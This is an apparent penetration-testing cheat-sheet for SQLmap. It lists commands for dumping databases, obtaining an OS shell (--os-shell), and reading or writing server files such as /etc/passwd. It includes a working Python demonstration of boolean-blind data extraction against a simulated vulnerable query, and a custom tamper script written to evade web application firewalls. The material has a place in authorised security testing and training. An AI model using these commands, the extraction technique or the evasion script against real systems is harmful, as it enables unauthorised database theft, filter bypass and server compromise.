SQLmap

SQLmap is an open-source tool that automates the detection and exploitation of SQL injection vulnerabilities. It is a standard tool in web penetration testing: it fingerprints the backend DBMS, finds injectable parameters, and then enumerates and dumps data (and, with enough privileges, reaches the file system and operating system) through the vulnerable parameter.

Basic Commands

| Action | Command |
|---|---|
| Simple test | `sqlmap -u $url` |
| POST request | `sqlmap -u $url --data "username=test&password=test"` |
| List databases | `sqlmap -u $url --dbs` |
| List tables | `sqlmap -u $url -D $dbname --tables` |
| List columns | `sqlmap -u $url -D $dbname -T $table --columns` |
| Dump data | `sqlmap -u $url -D $dbname -T $table -C "COL1,COL2" --dump` |

Add `--batch` to accept the default answer to every prompt for unattended runs. Results are cached per target under sqlmap's output directory, so repeating a command with `--dbs` or `--tables` does not re-test the injection point.

Injection Techniques

SQLmap supports several injection techniques for detecting and extracting data. The options below narrow what it tests, which both speeds up a scan and keeps it within the bounds you intend.

| Option | Meaning |
|---|---|
| `-p "param"` | Test only the named parameter instead of every parameter found in the request. |
| `--technique=BUEST` | Restrict detection to the listed techniques: B = Boolean-based blind, U = UNION query-based, E = Error-based, S = Stacked queries, T = Time-based blind. Q (inline queries) also exists; the default is all of them, `BEUSTQ`. |
| `--level=3` | Test depth (1 to 5). Higher levels add payloads and test more injection points: Cookie header values from level 2, User-Agent and Referer headers from level 3. |
| `--risk=3` | Payload risk (1 to 3). Risk 2 adds heavy time-based queries; risk 3 adds OR-based boolean payloads, which can modify or delete every row if the injection point sits in an UPDATE or DELETE statement. |
| `--os-shell` | Try to obtain an interactive operating-system shell through the DBMS. Needs a privileged database user and, depending on the DBMS, stacked queries or a writable web root reachable over HTTP. |
| `--cookie "SESSION=..."` | Send this Cookie header with every request so the tests run inside an authenticated session. |
| `--random-agent` | Pick a random User-Agent from sqlmap's built-in list instead of the default `sqlmap/...` string, which simple bot filters block on sight. |
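To make concrete what the B technique in the table does on the wire, here is an added example (not from the page and not sqlmap's own code) that performs a boolean-based blind extraction against a constructed in-memory SQLite table. The table, the `?id=` parameter, the `users`/`secret` names and the secret value are all constructed for the demonstration; the inference method, asking only "is this character's code point greater than N?" and binary-searching, is what sqlmap automates when you pass `--technique=B`.

```python
"""
Added example: boolean-based blind (technique B) extraction, simulated.
Constructed setup: an in-memory SQLite table plays the target's backend and
Oracle.page_has_row() plays the vulnerable endpoint (?id=<input>).
"""
import sqlite3

SECRET = "s3cr3t-Fl4g"   # constructed value that we will recover blind


def make_db():
    """Constructed backend: one table with one interesting row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    conn.execute("INSERT INTO users VALUES (2, 'guest', 'nothing here')")
    return conn


class Oracle:
    """
    Simulated vulnerable endpoint. The attacker observes one bit per request:
    whether the page rendered a row (True) or not (False). That single bit is
    the 'boolean' in boolean-based blind injection.
    """

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0   # counts HTTP requests the real attack would make

    def page_has_row(self, user_input):
        self.requests += 1
        # Deliberately vulnerable: the id parameter is concatenated into the
        # query, which is exactly what `sqlmap -p id --technique=B` exploits.
        sql = f"SELECT name FROM users WHERE id = {user_input}"
        return self.conn.execute(sql).fetchone() is not None


def _binary_search(oracle, int_expr, lo, hi):
    """
    Recover the integer value of the SQL expression int_expr, known to lie in
    [lo, hi], using only 'is it greater than mid?' questions. ceil(log2(hi-lo+1))
    requests instead of one per candidate value.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.page_has_row(f"1 AND ({int_expr}) > {mid}"):
            lo = mid + 1          # true branch: value is above mid
        else:
            hi = mid              # false branch: value is mid or below
    return lo


def blind_extract(oracle, str_expr, max_len=64):
    """Recover the text value of SQL expression str_expr one character at a time."""
    # Step 1: learn the length, so we know when to stop.
    length = _binary_search(oracle, f"length({str_expr})", 0, max_len)
    # Step 2: recover each character's code point (printable ASCII assumed).
    chars = []
    for pos in range(1, length + 1):
        code = _binary_search(
            oracle, f"unicode(substr({str_expr}, {pos}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def run_demo():
    """Extract the admin secret and report how many requests it cost."""
    oracle = Oracle(make_db())
    recovered = blind_extract(
        oracle, "(SELECT secret FROM users WHERE name = 'admin')")
    return recovered, oracle.requests


if __name__ == "__main__":
    value, n = run_demo()
    print(f"recovered {value!r} in {n} requests")
```

Every character costs roughly seven requests here, and a 64-byte column would cost several hundred; that is why sqlmap prefers U and E, which return whole rows per request, and only falls back to B. Time-based blind (T) is the same inference with response latency as the oracle, so each request additionally waits out the injected delay, which is where `--threads` pays off.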

WAF Evasion

SQLmap ships tamper scripts that rewrite each payload before it is sent, to slip past Web Application Firewalls (WAFs) and simple keyword or character filters. Several can be chained with a comma-separated list, and they are applied in priority order; many are DBMS-specific (a MySQL comment trick will break an MSSQL query), so check the script's docstring, or run `sqlmap --list-tampers`, before using one.

sqlmap -u $url --tamper=SCRIPT

Commonly used tamper scripts:

| Script | Description |
|---|---|
| `space2comment` | Replaces spaces with `/**/` |
| `unionalltounion` | Replaces `UNION ALL SELECT` with `UNION SELECT` |
| `apostrophemask` | Replaces apostrophes with their UTF-8 full-width counterpart |
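When no built-in script fits the filter in front of you, writing your own is a small job: sqlmap loads any Python file from its `tamper/` directory that exposes `__priority__`, `dependencies()` and `tamper(payload, **kwargs)`. The following is an added example, not one of sqlmap's own scripts; it combines the `space2comment` transformation above with keyword case randomisation, leaves string literals untouched, and, like sqlmap's `space2comment`, treats a quote that appears before the first space as closing the application's own literal rather than opening a new one. The file name `space2commentcase.py` is an assumption.

```python
"""
Added example of a custom sqlmap tamper script (not shipped with sqlmap).
Save as tamper/space2commentcase.py (assumed name) inside the sqlmap tree and
select it with:  sqlmap -u $url --tamper=space2commentcase
"""
import random

try:
    # Inside sqlmap the priority constants come from the project itself.
    from lib.core.enums import PRIORITY
except ImportError:
    # Stand-alone fallback with the same constant values, so this file can be
    # unit-tested outside the sqlmap tree.
    class PRIORITY:
        LOWEST, LOWER, LOW, NORMAL, HIGH, HIGHER, HIGHEST = -100, -50, -10, 0, 10, 50, 100

__priority__ = PRIORITY.LOW   # ordering hint sqlmap uses when scripts are chained

# SQL keywords whose letter case we randomise; anything inside quotes is left alone.
KEYWORDS = {"SELECT", "UNION", "ALL", "AND", "OR", "NOT", "FROM", "WHERE",
            "ORDER", "BY", "NULL", "LIMIT", "CONCAT", "SLEEP", "CASE", "WHEN",
            "THEN", "END"}


def dependencies():
    # Hook sqlmap calls once at start-up so a script can warn about DBMS
    # constraints. Nothing to warn about here.
    pass


def _randomcase(word):
    return "".join(c.upper() if random.random() < 0.5 else c.lower() for c in word)


def tamper(payload, **kwargs):
    """
    Entry point sqlmap invokes for every payload.

    Replaces each space outside quoted strings with an inline comment and
    randomises the case of recognised keywords, e.g.
        1 AND 9227=9227   ->   1/**/aNd/**/9227=9227
    """
    if not payload:
        return payload

    out = []
    token = []          # identifier / keyword / number currently being read
    quote = None        # active quote character while inside a string literal
    seen_space = False  # quotes before the first space close the app's own literal

    def flush():
        if token:
            word = "".join(token)
            out.append(_randomcase(word) if word.upper() in KEYWORDS else word)
            token.clear()

    for ch in payload:
        if quote:                                  # inside a literal: copy verbatim
            out.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"') and seen_space:      # opening quote of a literal
            flush()
            quote = ch
            out.append(ch)
        elif ch == " ":                            # the space2comment part
            seen_space = True
            flush()
            out.append("/**/")
        elif ch.isalnum() or ch == "_":            # build up a word
            token.append(ch)
        else:                                      # operators, parentheses, commas
            flush()
            out.append(ch)
    flush()
    return "".join(out)


if __name__ == "__main__":
    for sample in ("1 AND 9227=9227", "' UNION ALL SELECT NULL,'a b'-- -"):
        print(sample, "->", tamper(sample))
```

Chaining it with another script (`--tamper=space2commentcase,between`) works the same way as with the built-ins. Tamper scripts never see the final URL-encoding step, so test the transformed payload against the target's DBMS before trusting that it still parses.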

File Access

⚠️ Requires a database user with sufficient privileges (e.g., the MySQL `FILE` privilege). On MySQL the server-side `secure_file_priv` setting further limits which directories, if any, can be read from or written to, so a failed read does not by itself mean the user lacks the privilege.

| Action | Command |
|---|---|
| Read a file | `sqlmap -u $url --file-read "/etc/passwd"` |
| Write a file | `sqlmap -u $url --file-write "/tmp/localFile" --file-dest "/path/to/remote"` |

SQLi Challenges